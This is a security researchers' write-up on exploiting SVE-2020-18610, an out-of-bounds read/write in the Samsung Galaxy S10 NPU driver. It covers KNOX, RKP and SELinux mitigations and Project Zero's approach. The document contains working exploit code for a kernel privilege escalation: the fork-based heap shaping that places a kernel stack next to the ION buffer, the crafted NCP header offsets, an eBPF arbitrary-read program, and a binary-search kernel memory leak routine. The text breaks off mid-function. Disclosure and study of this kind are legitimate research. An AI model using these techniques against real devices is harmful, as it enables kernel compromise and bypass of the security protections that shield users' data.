Galaxy's Meltdown - Exploiting SVE-2020-18610

Basic

Although Google Project Zero released a blog article about the Samsung Galaxy NPU bug, which is the same bug we found earlier, we are also publishing our write-up with a different exploit methodology. As the vulnerability itself is very simple, we focus on how to get AAR/AAW and how to bypass Samsung Galaxy mitigations like SELinux and KNOX. Our work was done on the Samsung Galaxy S10 and may also work on the Samsung Galaxy S20.

Before starting our exploit journey, we need to know some basic concepts about Samsung Galaxy internals. TL;DR :)

Samsung Galaxy's kernel mitigations

Samsung Galaxy implements its own security mechanisms on top of the Android ecosystem.

Let's take a brief look at the biggest obstacles - KNOX and SELinux.

KNOX

KNOX is Samsung Galaxy's security mechanism, which introduced many mitigations (dm-verity, KAP, PKM, etc.) to protect the Android kernel from Local Privilege Escalation.

The most important parts of the KNOX mechanism are RKP (Real-time Kernel Protection) and DFI (Data Flow Integrity).

RKP is implemented in the secure world, which can be either TrustZone or a hypervisor.

RKP provides functionality like preventing unauthorized privileged code from untrusted sources, preventing direct access from userspace, and verifying the integrity of important kernel data.

DFI protects root-related data (init_cred, page table entries, etc.) by allocating those objects in an RKP-protected read-only region, so even an attacker with an AAW (Arbitrary Address Write) primitive can't modify them.

struct cred init_cred __kdp_ro = {
	.usage			= ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
	.subscribers		= ATOMIC_INIT(2),
	.magic			= CRED_MAGIC,
#endif
	.uid			= GLOBAL_ROOT_UID,
	.gid			= GLOBAL_ROOT_GID,
	.suid			= GLOBAL_ROOT_UID,
  
  ...

Therefore, to modify this data, the kernel must go through a dedicated RKP interface called rkp_call/uh_call.

Of course, an attacker might think about abusing that interface to achieve their goal. The question is: is that possible?

The answer is that you can't simply abuse it anymore, because all RKP functions now perform data integrity checks internally.

// kernel/cred.c
void __put_cred(struct cred *cred)
{
	kdebug("__put_cred(%p{%d,%d})", cred,
	       atomic_read(&cred->usage),
	       read_cred_subscribers(cred));

#ifdef CONFIG_RKP_KDP
	if (rkp_ro_page((unsigned long)cred))
		BUG_ON((rocred_uc_read(cred)) != 0);
	else
#endif /*CONFIG_RKP_KDP*/
    
...

// fs/exec.c
#define RKP_CRED_SYS_ID 1000

static int is_rkp_priv_task(void)
{
	struct cred *cred = (struct cred *)current_cred();

	if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
		cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
		return 1;
	}
	return 0;
}

As the code snippet above shows, when a new credential is installed via the commit_creds() function, __put_cred() is called internally. When __put_cred() ends up in an rkp_call/uh_call, the hypervisor/TrustZone checks whether the process credential resides in an RKP-protected read-only memory area, and helpers like is_rkp_priv_task() check whether the caller's uid/gid falls into the privileged range (1000 or below).

So, forging the task_struct->cred member is no longer a valid approach.

Also, Linux kernel attackers traditionally abused ptmx_fops to get an arbitrary function call primitive, because ptmx_fops could be overwritten by the attacker, making it a great target.

But due to RKP, every fops structure in the Samsung Galaxy kernel, including ptmx_fops, resides in a read-only region. Attackers can't use the old way, so they must find another way to get a reliable arbitrary function call primitive.

SELinux

Prior to Android 4.3, Google relied on application sandboxing as the Android security model. Since Android 5.0, SELinux is the main security mechanism in the Android system, and it is fully enforced by default.

On Google Nexus and Pixel devices, SELinux enforcement is controlled by a single writable global variable in kernel space named selinux_enforcing. Thus, if selinux_enforcing is false, SELinux does not enforce anything on those systems.

However, Samsung Galaxy's SELinux enforcement doesn't rely solely on selinux_enforcing, because Samsung customized SELinux to harden its original weaknesses. On top of SELinux's original permission management, the following code snippets show that an additional integrity check was added to almost all system call interfaces.

struct cred {
  ...
#ifdef CONFIG_RKP_KDP
	atomic_t *use_cnt;
	struct task_struct *bp_task;
	void *bp_pgd;
	unsigned long long type;
#endif /*CONFIG_RKP_KDP*/
} __randomize_layout;

First, the cred structure gains members like bp_task and bp_pgd, used by SELinux's security_integrity_current function. When a new credential is committed or overridden in the secure world, RKP records its owner in bp_task and its PGD in bp_pgd.

// security/security.c
#define call_void_hook(FUNC, ...)				\
	do {							\
		struct security_hook_list *P;			\
								\
		if(security_integrity_current()) break;	\
		list_for_each_entry(P, &security_hook_heads.FUNC, list)	\
			P->hook.FUNC(__VA_ARGS__);		\
	} while (0)

#define call_int_hook(FUNC, IRC, ...) ({			\
	int RC = IRC;						\
	do {							\
		struct security_hook_list *P;			\
								\
		RC = security_integrity_current();		\
		if (RC != 0)							\
			break;								\
		list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
			RC = P->hook.FUNC(__VA_ARGS__);		\
			if (RC != 0)				\
				break;				\
		}						\
	} while (0);						\
	RC;							\
})

...
  
// security/selinux/hooks.c
int security_integrity_current(void)
{
	rcu_read_lock();
	if ( rkp_cred_enable && 
		(rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
		cmp_sec_integrity(current_cred(),current->mm)||
		cmp_ns_integrity())) {
		rkp_print_debug();
		rcu_read_unlock();
		panic("RKP CRED PROTECTION VIOLATION\n");
	}
	rcu_read_unlock();
	return 0;
}

If CONFIG_RKP_KDP is enabled, the security_integrity_current function is active; it verifies the cred security context of a process. Simply put, it checks the following things.

  1. Whether the cred and security pointers in the process descriptor are allocated in the RKP-protected read-only memory area.
  2. Whether bp_cred and cred are consistent, to detect modification.
  3. Whether bp_task is the current process.
  4. Whether mm->pgd and cred->bp_pgd are consistent.
  5. Whether current->nsproxy->mnt_ns->root and current->nsproxy->mnt_ns->root->mnt->bp_mount are consistent.

Samsung also places SELinux-related data such as cred->security, task_security_struct and selinux_ops in the RKP-protected read-only memory region to prevent data forgery via an attacker's AAW primitive.

That is a brief overview of what Samsung's customized SELinux does.

Besides its security role, SELinux is also an important measure from the vulnerability market's perspective, because it is used to estimate a bug's value in the Android ecosystem.

For example, a bug that can be triggered from the "isolated_app" context is generally more valuable than a bug that can only be triggered from the "untrusted_app" context.

We can check this information with the following commands.

adb pull /sys/fs/selinux/policy
sesearch --allow policy |  grep -v "magisk" |  grep "isolated_app"

Previously released Samsung Galaxy exploits

Previous KNOX bypass exploits are well described in x82's slides from POC 2019.

Several articles have been published online; let's take a quick look at them.

KNOX 2.6 (Samsung Galaxy S7)

In their Black Hat USA 2017 slides, KeenLab published a new way to bypass DFI and SELinux.

First, they called rkp_override_creds to override their own cred in some tricky way (we don't know the exact details of this trick), even though RKP does uid checking inside rkp_override_creds. Then, they used the orderly_poweroff function with a modified poweroff_cmd so that call_usermodehelper would spawn a privileged process. After getting a privileged process with full root capabilities, they called rkp_override_creds again to change its cred information.

Even though the newly created process has full root capabilities, SELinux still limits its access to the filesystem.

KNOX 2.8 (Samsung Galaxy S8)

The __orderly_poweroff() technique was patched by adding uid and binary path verification to the binary-loading path (load_elf_binary() / flush_old_exec()).

static int kdp_check_sb_mismatch(struct super_block *sb) 
{	
	if(is_recovery || __check_verifiedboot) {
		return 0;
	}
	if((sb != rootfs_sb) && (sb != sys_sb)
		&& (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
		return 1;
	}
	return 0;
}

static int invalid_drive(struct linux_binprm * bprm) 
{
	struct super_block *sb =  NULL;
	struct vfsmount *vfsmnt = NULL;
	
	vfsmnt = bprm->file->f_path.mnt;
	if(!vfsmnt || 
		!rkp_ro_page((unsigned long)vfsmnt)) {
		printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
		return 1;
	} 
	sb = vfsmnt->mnt_sb;

	if(kdp_check_sb_mismatch(sb)) {
		printk("\nSuperblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
					bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
		return 1;
	}

	return 0;
}

#define RKP_CRED_SYS_ID 1000
static int is_rkp_priv_task(void)
{
	struct cred *cred = (struct cred *)current_cred();

	if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
		cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
		return 1;
	}
	return 0;
}
#endif

int flush_old_exec(struct linux_binprm * bprm)
{
	...
#ifdef CONFIG_RKP_NS_PROT
	if(rkp_cred_enable &&
		is_rkp_priv_task() && 
		invalid_drive(bprm)) {
		panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
	}
#endif /*CONFIG_RKP_NS_PROT*/
  ...

As you can see, if the caller's uid (or gid) is at most 1000, the kernel checks whether the binary's mount point belongs to the RKP-protected, whitelisted superblocks. But these verifications were not added to load_script(), so an attacker could still run an arbitrary root script instead of a binary.

All of the above techniques are patched now, so a new way is required to bypass Samsung Galaxy's custom SELinux and KNOX.

NPU Driver

The NPU was introduced with the Exynos 9820, which means every Samsung Galaxy device from the Exynos 9820 onward ships the NPU kernel driver.

Before the vulnerability was patched, this driver was accessible from untrusted_app (Chromium browser, normal apps, ...), but since Samsung's security update in November 2020, untrusted_app is also restricted by a new SELinux policy.

We can use the NPU driver simply by opening /dev/vertex10; the driver provides various ioctl commands to the user.

long vertex_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
	int ret = 0;
	struct vision_device *vdev = vision_devdata(file);
	const struct vertex_ioctl_ops *ops = vdev->ioctl_ops;

	/* temp var to support each ioctl */
	union {
		struct vs4l_graph vsg;
		struct vs4l_format_list vsf;
		struct vs4l_param_list vsp;
		struct vs4l_ctrl vsc;
		struct vs4l_container_list vscl;
	} vs4l_kvar;

	switch (cmd) {
	case VS4L_VERTEXIOC_S_GRAPH:
		ret = get_vs4l_graph64(&vs4l_kvar.vsg,
				(struct vs4l_graph __user *)arg);
		if (ret) {
			vision_err("get_vs4l_graph64 (%d)\n", ret);
			break;
		}

		ret = ops->vertexioc_s_graph(file, &vs4l_kvar.vsg);
		if (ret)
			vision_err("vertexioc_s_graph is fail(%d)\n", ret);

		put_vs4l_graph64(&vs4l_kvar.vsg,
				(struct vs4l_graph __user *)arg);
		break;

	case VS4L_VERTEXIOC_S_FORMAT:
		ret = get_vs4l_format64(&vs4l_kvar.vsf,
				(struct vs4l_format_list __user *)arg);
		if (ret) {
			vision_err("get_vs4l_format64 (%d)\n", ret);
			break;
		}

		ret = ops->vertexioc_s_format(file, &vs4l_kvar.vsf);
		if (ret)
			vision_err("vertexioc_s_format (%d)\n", ret);

		put_vs4l_format64(&vs4l_kvar.vsf,
				(struct vs4l_format_list __user *)arg);
		break;
      
...

Although there are more NPU ioctl commands, we focus on only two of them, VS4L_VERTEXIOC_S_GRAPH and VS4L_VERTEXIOC_S_FORMAT, because the vulnerability we used is in the VS4L_VERTEXIOC_S_GRAPH command, and the VS4L_VERTEXIOC_S_FORMAT command is used for the out-of-bounds read/write.

const struct vertex_ioctl_ops npu_vertex_ioctl_ops = {
	.vertexioc_s_graph      = npu_vertex_s_graph,
	.vertexioc_s_format     = npu_vertex_s_format,
	.vertexioc_s_param      = npu_vertex_s_param,
	.vertexioc_s_ctrl       = npu_vertex_s_ctrl,
	.vertexioc_qbuf         = npu_vertex_qbuf,
	.vertexioc_dqbuf        = npu_vertex_dqbuf,
	.vertexioc_prepare      = npu_vertex_prepare,
	.vertexioc_unprepare    = npu_vertex_unprepare,
	.vertexioc_streamon     = npu_vertex_streamon,
	.vertexioc_streamoff    = npu_vertex_streamoff
};

Functions like get_vs4l_graph64 are just wrappers around copy_from_user, so we only need to focus on vertexioc_s_graph and vertexioc_s_format. These functions are defined in drivers/vision/npu/npu-vertex.c.

int npu_session_s_graph(struct npu_session *session, struct vs4l_graph *info)
{
	int ret = 0;
	BUG_ON(!session);
	BUG_ON(!info);
	ret = __get_session_info(session, info);
	if (unlikely(ret)) {
		npu_uerr("invalid in __get_session_info\n", session);
		goto p_err;
	}
	ret = __config_session_info(session);
	if (unlikely(ret)) {
		npu_uerr("invalid in __config_session_info\n", session);
		goto p_err;
	}
	return ret;
p_err:
	npu_uerr("Clean-up buffers for graph\n", session);
	return ret;
}

First, npu_session_s_graph calls __get_session_info to map the corresponding ION fd. As the following code snippet shows, one thing to remember is that vmalloc is used in this map operation.

void *ion_heap_map_kernel(struct ion_heap *heap,
			  struct ion_buffer *buffer)
{
	...
  
	int npages = PAGE_ALIGN(buffer->size) / PAGE_SIZE;
	struct page **pages = vmalloc(sizeof(struct page *) * npages);

  ...

	return vaddr;
}

Then, __config_session_info is called to configure the npu_session by parsing user-supplied data.

int __config_session_info(struct npu_session *session)
{
	...

	ret = __pilot_parsing_ncp(session, &temp_IFM_cnt, &temp_OFM_cnt, &temp_IMB_cnt, &WGT_cnt);

  ...
    
	ret = __second_parsing_ncp(session, &temp_IFM_av, &temp_OFM_av, &temp_IMB_av, &WGT_av);

struct npu_session consists of various members, but one important member is ncp_mem_buf.

struct npu_memory_buffer {
	struct list_head		list;
	struct dma_buf			*dma_buf;
	struct dma_buf_attachment	*attachment;
	struct sg_table			*sgt;
	dma_addr_t			daddr;
	void				*vaddr;
	size_t				size;
	int				fd;
};

...

struct npu_session {
	...
	struct npu_memory_buffer *ncp_mem_buf;
	...
};

ncp_mem_buf->vaddr is a vmalloc'ed region returned from ion_heap_map_kernel, and the user can place data into that region by mmaping the ION DMA file descriptor. So each parameter like temp_IFM_cnt and temp_IFM_av is initialized from user data.

ION allocator

The ION allocator is a memory pool manager that allocates memory buffers sharable between userspace, the kernel, and co-processors. Its main usage is to allocate DMA buffers and share that memory with various hardware components.

// drivers/staging/android/uapi/ion.h (Samsung Galaxy kernel source)

enum ion_heap_type {
	ION_HEAP_TYPE_SYSTEM,
	ION_HEAP_TYPE_SYSTEM_CONTIG,
	ION_HEAP_TYPE_CARVEOUT,
	ION_HEAP_TYPE_CHUNK,
	ION_HEAP_TYPE_DMA,
	ION_HEAP_TYPE_CUSTOM, /*
			       * must be last so device specific heaps always
			       * are at the end of this enum
			       */
	ION_HEAP_TYPE_CUSTOM2,
	ION_HEAP_TYPE_HPA = ION_HEAP_TYPE_CUSTOM,
};

...

struct ion_allocation_data {
	__u64 len;
	__u32 heap_id_mask;
	__u32 flags;
	__u32 fd;
	__u32 unused;
};

There are two important structures for the ION allocator. struct ion_allocation_data is used by the userspace ioctl command to allocate an ION buffer; its fd member is set if the allocation succeeds.

enum ion_heap_type is used to create a specific type of memory pool during the initialization phase.

A userspace application can use the ION allocator via the /dev/ion interface, as in the following code.

The heap_id_mask member of ion_allocation_data selects the specific ION heap we want.

int prepare_ion_buffer(uint64_t size) {
    int kr;
    int ion_fd = open("/dev/ion", O_RDONLY);
    struct ion_allocation_data data;
    memset(&data, 0, sizeof(data));

    data.len = size;
    data.heap_id_mask = 1 << 1;
    data.flags = ION_FLAG_CACHED;
    if ((kr = ioctl(ion_fd, ION_IOC_ALLOC, &data)) < 0) {
        return kr;
    }

    return data.fd;
}

...

void work() {
  int dma_fd = prepare_ion_buffer(0x7000);
  void *ion_buffer = mmap(NULL, 0x7000, PROT_READ|PROT_WRITE, MAP_SHARED, dma_fd, 0);
}

In our NPU case, the allocated ION buffer is passed to ion_heap_map_kernel to synchronize with the NPU device.

And by mmaping data.fd, that ION buffer is also synchronized with a userspace buffer.

Vulnerability

The vulnerability exists in both the __pilot_parsing_ncp and __second_parsing_ncp functions.

int __second_parsing_ncp(
	struct npu_session *session,
	struct temp_av **temp_IFM_av, struct temp_av **temp_OFM_av,
	struct temp_av **temp_IMB_av, struct addr_info **WGT_av)
{
	u32 address_vector_offset;
	u32 address_vector_cnt;
	u32 memory_vector_offset;
	u32 memory_vector_cnt;
	...
	struct ncp_header *ncp;
	struct address_vector *av;
	struct memory_vector *mv;
	...
	char *ncp_vaddr;
  ...
	ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;
	ncp = (struct ncp_header *)ncp_vaddr;
	...
	address_vector_offset = ncp->address_vector_offset;
	address_vector_cnt = ncp->address_vector_cnt;
	...
	memory_vector_offset = ncp->memory_vector_offset;
	memory_vector_cnt = ncp->memory_vector_cnt;
	...
	mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);
	av = (struct address_vector *)(ncp_vaddr + address_vector_offset);
	...
	for (i = 0; i < memory_vector_cnt; i++) {
		u32 memory_type = (mv + i)->type;
		u32 address_vector_index;
		u32 weight_offset;

		switch (memory_type) {
		case MEMORY_TYPE_IN_FMAP:
			{
				address_vector_index = (mv + i)->address_vector_index;
				if (!EVER_FIND_FM(IFM_cnt, *temp_IFM_av, address_vector_index)) {
					(*temp_IFM_av + (*IFM_cnt))->index = address_vector_index;
					(*temp_IFM_av + (*IFM_cnt))->size = (av + address_vector_index)->size;
					(*temp_IFM_av + (*IFM_cnt))->pixel_format = (mv + i)->pixel_format;
					(*temp_IFM_av + (*IFM_cnt))->width = (mv + i)->width;
					(*temp_IFM_av + (*IFM_cnt))->height = (mv + i)->height;
					(*temp_IFM_av + (*IFM_cnt))->channels = (mv + i)->channels;
          ...

The most critical out-of-bounds read/write occurs in the __second_parsing_ncp function. As we said in the section above, session->ncp_mem_buf->vaddr consists of user data.

So address_vector_offset, address_vector_cnt, memory_vector_offset and memory_vector_cnt are all initialized from our data. As the variable names imply, address_vector_offset and memory_vector_offset are used to calculate the address of each vector in memory.

But as there is no bounds check, we can make mv and av point to an arbitrary region of kernel space, and through mv and av we can fill temp_IFM_av with values read from out-of-bounds memory.
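
To make this concrete, here is a minimal userspace sketch of how the offsets could be pushed out of bounds. The field names come from the kernel code above and from the ncp_page helper used later in this write-up, but the struct layout, offsets and sizes below are illustrative assumptions, not the real ncp_header definition.

#include <sys/mman.h>
#include <stdint.h>

/* Assumed minimal view of the header the driver parses; the real
 * struct ncp_header has many more fields and different offsets. */
struct fake_ncp_header {
	uint32_t magic_number;
	uint32_t address_vector_offset;
	uint32_t address_vector_cnt;
	uint32_t memory_vector_offset;
	uint32_t memory_vector_cnt;
};

void craft_oob_header(int dma_fd) /* dma_fd from prepare_ion_buffer() in the ION section above */
{
	struct fake_ncp_header *ncp = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
					   MAP_SHARED, dma_fd, 0);

	/* No bounds check in __second_parsing_ncp(): mv ends up pointing
	 * 0x10000 bytes past the start of the vmap-ed ION buffer. */
	ncp->memory_vector_offset = 0x10000;
	ncp->memory_vector_cnt    = 1;

	/* av can stay inside the buffer, or be pushed out of bounds too. */
	ncp->address_vector_offset = 0x200;
	ncp->address_vector_cnt    = 1;

	/* Issuing VS4L_VERTEXIOC_S_GRAPH on /dev/vertex10 now makes the
	 * parser read and write through the out-of-bounds mv/av pointers. */
}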

Getting AAR/AAW

Now we have an out-of-bounds read/write, but how do we turn it into AAR/AAW primitives?

First, we need to know where we are, to identify which kernel objects we can read and write. Since the ION buffer is mapped into the NPU session via vmalloc and the out-of-bounds access happens in this region, we need to understand vmalloc's allocation algorithm and which objects are allocated via vmalloc.

vmalloc?

In the kernel, there are two main memory allocation APIs.

  • kmalloc
  • vmalloc

The main difference between kmalloc and vmalloc is physical contiguity. Memory allocated by kmalloc is contiguous both physically and virtually. On the other hand, vmalloc returns virtually contiguous memory, but the backing pages may be scattered across physical memory.
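
As a quick toy illustration of the two APIs (both are standard kernel interfaces; this is not code from the NPU driver):

#include <linux/slab.h>
#include <linux/vmalloc.h>

static void alloc_example(void)
{
	/* kmalloc: physically and virtually contiguous, served by the slab
	 * allocator. */
	void *kbuf = kmalloc(4096, GFP_KERNEL);

	/* vmalloc: virtually contiguous only; backing pages may be scattered
	 * in physical memory and are mapped into the vmalloc area. */
	void *vbuf = vmalloc(1 << 14);

	kfree(kbuf);
	vfree(vbuf);
}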

A very important feature of vmalloc is that it allocates guard pages.

// kernel/fork.c
static unsigned long *alloc_thread_stack_node(struct task_struct *tsk, int node)
{
#ifdef CONFIG_VMAP_STACK
	void *stack;
	...
	stack = __vmalloc_node_range(THREAD_SIZE, THREAD_ALIGN,
				     VMALLOC_START, VMALLOC_END,
				     THREADINFO_GFP,
				     PAGE_KERNEL,
				     0, node, __builtin_return_address(0));
  ...

As THREAD_SIZE is (1 << 14) on ARM64, each kernel thread stack is 16KB (four 4KB pages). Each kernel thread stack also has leading/trailing guard pages to protect the kernel from single linear overflow vulnerabilities.

So, when we tested this vulnerability earlier this year, we realized that we had to shape the heap to exploit it. If we can successfully shape the heap like the layout sketched below, the guard page is not a hurdle for us, because we have a powerful out-of-bounds read/write whose offset can simply skip over it!
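
The original post illustrates this with images; as a rough substitute, the layout we are aiming for looks like this (our own sketch of the description above):

 vmalloc area, low -> high addresses

 +------------------------------+
 |  vmap-ed ION buffer          |  <- session->ncp_mem_buf->vaddr,
 |  (attacker-controlled data)  |     OOB accesses start here
 +------------------------------+
 |  guard page (unmapped)       |  <- never dereferenced: our offsets
 +------------------------------+     simply skip over it
 |  victim kernel thread stack  |  <- spilled syscall arguments,
 |  (CONFIG_VMAP_STACK)         |     saved registers, return addresses
 +------------------------------+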

Google Project Zero's Methodology

As we mentioned above, to successfully exploit this bug we need to shape the heap as described. P0 used a bunch of binder file descriptors and user threads to shape the heap. The detailed method and code can be found in P0's blog post.

Out of bounds addition

They directly used the out-of-bounds read/write in the __second_parsing_ncp function.

In the MEMORY_TYPE_WMASK case, they can make (av + address_vector_index)->m_addr point outside the vmap-ed buffer. So, via the (av + address_vector_index)->m_addr = weight_offset + ncp_daddr; statement, they can add ncp_daddr to a value at an arbitrary out-of-bounds address beyond the ION buffer.

int __second_parsing_ncp(
	struct npu_session *session,
	struct temp_av **temp_IFM_av, struct temp_av **temp_OFM_av,
	struct temp_av **temp_IMB_av, struct addr_info **WGT_av)
{
  		...
	    struct address_vector *av;
	    ...
	    address_vector_offset = ncp->address_vector_offset; /* u32 */
	    ...
	    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);
	    ...
	    case MEMORY_TYPE_WMASK:
	    {
	        // update address vector, m_addr with ncp_alloc_daddr + offset
	        address_vector_index = (mv + i)->address_vector_index;
	        weight_offset = (av + address_vector_index)->m_addr;
	        if (weight_offset > (u32)session->ncp_mem_buf->size) {
	            ret = -EINVAL;
	            ...
	            goto p_err;
	        }
	        (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;
	        ....

Of course, since their out-of-bounds addition primitive is restricted to adding ncp_daddr, one thing they had to resolve was controlling ncp_daddr to get a desired value. Because ncp_daddr is the device address of the ION buffer, they needed to place the ION buffer at a specific location with a specific size. They solved this, after a lot of testing, by using ION heap type 5, which typically allocates device addresses from low to high.

Bypass KASLR

They chose the pselect() system call to reach copy_to_user() in kernel space. In pselect(), the target thread blocks before copy_to_user() runs; meanwhile, from the main exploit thread, they modify the size parameter of that copy_to_user().

int core_sys_select(int n, fd_set __user *inp, fd_set __user *outp,
			   fd_set __user *exp, struct timespec64 *end_time)
{
	...
	ret = do_select(n, &fds, end_time);
	...
	if (set_fd_set(n, inp, fds.res_in) ||
	    set_fd_set(n, outp, fds.res_out) ||
	    set_fd_set(n, exp, fds.res_ex))
    ...

A very interesting thing in this part is that even though n arrives in a register, it must be spilled to the stack while do_select is blocked. So, if the spilled n is modified via the out-of-bounds write, that many bytes get copied to userspace.

static inline unsigned long __must_check
set_fd_set(unsigned long nr, void __user *ufdset, unsigned long *fdset)
{
	if (ufdset)
		return __copy_to_user(ufdset, fdset, FDS_BYTES(nr));
	return 0;
}

Although __copy_to_user() involves some optimization, inlining issues and sanity checks, they successfully leaked uninitialized kernel stack contents.

Hijack control flow

Controlling the stack contents to do ROP is the most complex part. Simply put, they used the pselect system call again: while do_select() is blocked in poll_schedule_timeout(), n can be modified by their out-of-bounds primitive. When unblocked, the for loop runs past the fds stack frame, and the stack contents get overwritten.

static int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)
{
...
    retval = 0;
    for (;;) {
...
        inp = fds->in; outp = fds->out; exp = fds->ex;
        rinp = fds->res_in; routp = fds->res_out; rexp = fds->res_ex;
	//
        for (i = 0; i < n; ++rinp, ++routp, ++rexp) {
...
            in = *inp++; out = *outp++; ex = *exp++;
            all_bits = in | out | ex;
            if (all_bits == 0) {
                i += BITS_PER_LONG;
                continue;
            }
	//
            for (j = 0, bit = 1; j < BITS_PER_LONG; ++j, ++i, bit <<= 1) {
                struct fd f;
                if (i >= n)
                    break;
                if (!(bit & all_bits))
                    continue;
                f = fdget(i);
                if (f.file) {
...
                    if (f_op->poll) {
...
                        mask = (*f_op->poll)(f.file, wait);
                    }
                    fdput(f);
                    if ((mask & POLLIN_SET) && (in & bit)) {
                        res_in |= bit;
                        retval++;
...
                    }
...
                }
            }
            if (res_in)
                *rinp = res_in;
            if (res_out)
                *routp = res_out;
            if (res_ex)
                *rexp = res_ex;
            cond_resched();
        }
...
        if (retval || timed_out || signal_pending(current))
            break;
...
        if (!poll_schedule_timeout(&table, TASK_INTERRUPTIBLE,
                       to, slack))
            timed_out = 1;
    }
...
    return retval;
}

After getting ROP in the kernel, they used the eBPF subsystem: if you can pass an arbitrary X1 register value to ___bpf_prog_run(), you get arbitrary address read/write and kernel function calls by executing a sequence of eBPF instructions.
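
As a rough illustration of the idea (not P0's actual payload), assume the interpreter is entered with its second argument pointing at an attacker-controlled instruction array; then a tiny unverified program is enough for an arbitrary 64-bit read:

#include <linux/bpf.h>	/* struct bpf_insn and the BPF_* opcode macros */

/* Illustrative only: target address split across the two slots of the
 * BPF_LD_IMM64 pseudo instruction, then dereferenced and returned. */
struct bpf_insn aar_prog[] = {
	/* r1 = target kernel address (64-bit immediate, two slots) */
	{ .code = BPF_LD | BPF_IMM | BPF_DW, .dst_reg = 1,
	  .imm = 0x44434241 /* low 32 bits of the target */ },
	{ .imm = (__s32)0xffffffc0 /* high 32 bits of the target */ },

	/* r0 = *(u64 *)(r1 + 0)  -> the arbitrary read */
	{ .code = BPF_LDX | BPF_MEM | BPF_DW, .dst_reg = 0, .src_reg = 1 },

	/* return r0 to the caller of ___bpf_prog_run() */
	{ .code = BPF_JMP | BPF_EXIT },
};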

Our Methodology

We also shaped the heap like P0 did, but instead of binder fds and user threads we used the fork() system call, because fork() also allocates the child's kernel stack via vmalloc (CONFIG_VMAP_STACK). As we developed this exploit on a stock Samsung Galaxy S10 SM-G973N, all the information we could get came from the adb bugreport command.

...
  
atomic_int *wait_count;

int parent_pipe[2];
int child_pipe[2];
int trig_pipe[2];

void *read_sleep_func(void *arg){
    atomic_fetch_add(wait_count, 1);
    syscall(__NR_read, trig_pipe[0], 0x41414141, 0x13371337, 0x42424242, 0x43434343);

    return NULL;
}

...
  
int main(int argc, char *argv[]) {
  	...
    pipe(parent_pipe);
    pipe(child_pipe);
    pipe(trig_pipe);
  	...
    *wait_count = 0;
    int par_pid = 0;
    if (!(par_pid = fork())) {
        for (int i = 0; i < 0x2000; i++) {
            int pid = 0;
            if (!(pid = fork())){
                read_sleep_func(NULL);
                return 0;
            }
        }
        return 0;
    }
  	...
    if(leak(0xeec8) != 0x41414141){
        write(trig_pipe[1], "A", 1); // child process kill
        for (int i = ion_fd; i < 0x3ff; i++) {
            close(i);
        }
        munmap(ncp_page, 0x7000);
        goto retry;
    }
  	...

By the very heuristic approach of checking whether a kernel crash occurs or not, we can finally place a child's kernel stack right after the ION buffer.

Initial kernel memory leak

Even though there are various information leak vectors, we used the VS4L_VERTEXIOC_S_FORMAT ioctl to reach the npu_session_format function in kernel space.

int npu_session_format(struct npu_queue *queue, struct vs4l_format_list *flist)
{
	...
	ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;
	ncp = (struct ncp_header *)ncp_vaddr;

	address_vector_offset = ncp->address_vector_offset;
	address_vector_cnt = ncp->address_vector_cnt;

	memory_vector_offset = ncp->memory_vector_offset;
	memory_vector_cnt = ncp->memory_vector_cnt;

	mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);
	av = (struct address_vector *)(ncp_vaddr + address_vector_offset);

	formats = flist->formats;

	if (flist->direction == VS4L_DIRECTION_IN) {
		FM_av = session->IFM_info[0].addr_info;
		FM_cnt = session->IFM_cnt;
	}
	...
	for (i = 0; i < FM_cnt; i++) {
		...
		bpp = (formats + i)->pixel_format;
		channels = (formats + i)->channels;
		width = (formats + i)->width;
		height = (formats + i)->height;
		cal_size = (bpp / 8) * channels * width * height;
    ...
#ifndef SYSMMU_FAULT_TEST
		if ((FM_av + i)->size > cal_size) {
			npu_uinfo("in_size(%zu), cal_size(%u) invalid\n", session, (FM_av + i)->size, cal_size);
			ret = NPU_ERR_DRIVER(NPU_ERR_SIZE_NOT_MATCH);
			goto p_err;
		}
#endif
	}
  ...

As (FM_av + i)->size is read from the out-of-bounds range and cal_size is computed purely from user-supplied data, we can guess the value of (FM_av + i)->size.

Some people may ask: "how can you guess the value of (FM_av + i)->size? You can't read it back into userspace!"

Yep. Even though we can't directly read the kernel value from userspace, we can recover it via binary search on the ioctl's return value. Like blind SQL injection: if (FM_av + i)->size > cal_size, the ioctl returns an error to the user, otherwise it succeeds. So we can recover the kernel base and a kernel stack address with this method.

unsigned long long _leak(u32 off){
    int res;
    struct vs4l_format format;

leak_retry:
    fd_clear();
    if ((npu_fd = open("/dev/vertex10", O_RDONLY)) < 0){
        goto leak_retry;
    }

    memset(&format, 0, sizeof(format));

    format.stride = 0x0;
    format.cstride =  0x0;
    format.height = 1;
    format.width = 1;
    format.pixel_format = 8;

    unsigned long long g = (0xffffffff) / 2;
    unsigned long long  h = 0xffffffff;
    unsigned long long l = 1;

    ncp_page->memory_vector_offset = 0x200;
    ncp_page->memory_vector_cnt = 0x1;
    ncp_page->address_vector_offset = off;
    ncp_page->address_vector_cnt = 0x1;

    if (npu_graph_ioctl() < 0){
        close(npu_fd);
        fd_clear();
        npu_fd = -1;
        goto leak_retry;
    }

    unsigned long long old = g;
    format.channels = g;
